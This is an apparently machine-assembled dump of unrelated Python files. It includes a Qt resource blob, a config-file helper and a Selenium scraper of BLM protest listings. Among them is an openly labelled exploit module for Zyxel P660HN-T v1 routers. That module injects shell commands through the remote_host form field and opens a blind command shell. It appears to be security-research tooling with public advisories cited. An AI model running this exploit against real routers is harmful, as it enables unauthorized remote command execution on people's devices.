\xf7\x93T\xc5\xe2\x02\xafY\xd0\x18\xa5\xaa\x8c.\xe6r\ \xdd\x0b\xf3\xb9\xb3\x8d\x1c\xb1b&s\x9f\xb6\xbc\x7f<\ \xeb\xd2\x1f\x01\x06\x00\xd2\x97^|\x9f\xc2\xaf\xc8\x00\x00\ \x00\x00IEND\xaeB`\x82\ " qt_resource_name = b"\ \x00\x05\ \x00o\xa6S\ \x00i\ \x00c\x00o\x00n\x00s\ \x00\x0b\ \x0d\xd7\xa0\xc7\ \x00s\ \x00h\x00u\x00f\x00f\x00l\x00e\x00.\x00p\x00n\x00g\ \x00\x0c\ \x07\x90\xdd\xa7\ \x00o\ \x00p\x00e\x00n\x00p\x00r\x00o\x00j\x00.\x00p\x00n\x00g\ " qt_resource_struct = b"\ \x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\ \x00\x00\x00\x00\x00\x00\x00\x00\ \x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x02\ \x00\x00\x00\x00\x00\x00\x00\x00\ \x00\x00\x00,\x00\x00\x00\x00\x00\x01\x00\x00\x03q\ \x00\x00\x01}\xe0D>B\ \x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\ \x00\x00\x01}\xe0D>B\ " def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) qInitResources()
1.28125
1
apis_configs/config_helper.py
yewu/icdc-demo
2
12796648
import json import os # make it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of folders to search for configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name search_folders defaults to default_search_folders if not specified return the first path to file_name found ''' search_folders = search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder in search_folders ] return [ path for path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders return the loaded json data or None if file not found ''' actual_files = find_paths(file_name, app_name, search_folders) if not actual_files: return None with open(actual_files[0], 'r') as reader: return json.load(reader)
2.703125
3
maza/modules/exploits/routers/zyxel/p660hn_t_v1_rce.py
ArturSpirin/maza
2
12796649
from maza.core.exploit import * from maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { "name": "Zyxel P660HN-T v1 RCE", "description": "Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. " "If the target is vulnerable it allows to execute commands on operating system level.", "authors": ( "<NAME> <pedrib[at]gmail.com>", # vulnerability discovery "<NAME> <marcin[at]threat9.com>", # routersploit module ), "references": ( "http://seclists.org/fulldisclosure/2017/Jan/40", "https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt", "https://blogs.securiteam.com/index.php/archives/2910", ), "devices": ( "Zyxel P660HN-T v1", ), } target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1") port = OptPort(80, "Target port") def run(self): if self.check(): print_success("Target appears to be vulnerable") print_status("Invoking command loop...") print_status("It is blind command injection - response is not available") shell(self, architecture="mipsbe") else: print_error("Target seems to be not vulnerable") def execute(self, cmd): payload = ";{};#".format(cmd) data = { "remote_submit_Flag": "1", "remote_syslog_Flag": "1", "RemoteSyslogSupported": "1", "LogFlag": "0", "remote_host": payload, "remoteSubmit": "Save" } self.http_request( method="POST", path="/cgi-bin/ViewLog.asp", data=data ) return "" @mute def check(self): response = self.http_request( method="GET", path="/cgi-bin/authorize.asp", ) if response is None: return False if "ZyXEL P-660HN-T1A" in response.text: return True return False
2.328125
2
Code/webscrape.py
tcampbell3/Black-Lives-Matter-Lethal-Force
1
12796650
#Instructions from https://www.youtube.com/watch?v=XQgXKtPSzUI&t=174s #How to open python in command prompt: #1) Shift+Right Click -> open command prompt #2) type "conda activate" #3) type "python" #To run the python script, type the following line into the command prompt: #python "C:\Users\travi\Dropbox\Police Killings\Do Files\webscrape.py" # import packages import time import itertools import csv import codecs from bs4 import BeautifulSoup from selenium import webdriver from time import sleep # access website through automated chrome chrome_path=r"C:\Users\travi\Anaconda3\Lib\site-packages\selenium\chromedriver.exe" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = "../Data/BLM Protests/protests_scrape.csv" f = codecs.open(filename, encoding='utf-8', mode='w+') headers = "Location, Date, Subject, Description, Participants\n" f.write(headers) # loop clicks over all pages page_new = 1 pagenum = -1 while(pagenum < page_new): #click to next page if pagenum > -1: driver.find_element_by_xpath("""//*[@id="blm-results"]/div[1]/ul/li[4]""").click() # don't overflow website sleep(2) #update page numbers for while statement page_new = driver.find_element_by_xpath("""//*[@id="blm-results"]/div[1]/ul/li[3]/input""").get_attribute("value") page_new = int(page_new, 10) #coverts from string to numeric pagenum = pagenum + 1 # append data from this click locations = driver.find_elements_by_class_name("item-protest-location") dates = driver.find_elements_by_class_name("protest-start") participants = driver.find_elements_by_class_name("item-protest-participants") descriptions = driver.find_elements_by_class_name("item-protest-description") subjects = driver.find_elements_by_class_name("item-protest-subject") for (a, b, c, d, e) in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(",", "|") + "," + b.text.replace(",", "|") + "," + c.text.replace(",", "|").replace("Subject(s): ","") + "," + d.text.replace(",", "|").replace("Description: ","") + "," + e.text + "\n") # close browser driver.quit() # close csv file f.close()
3.71875
4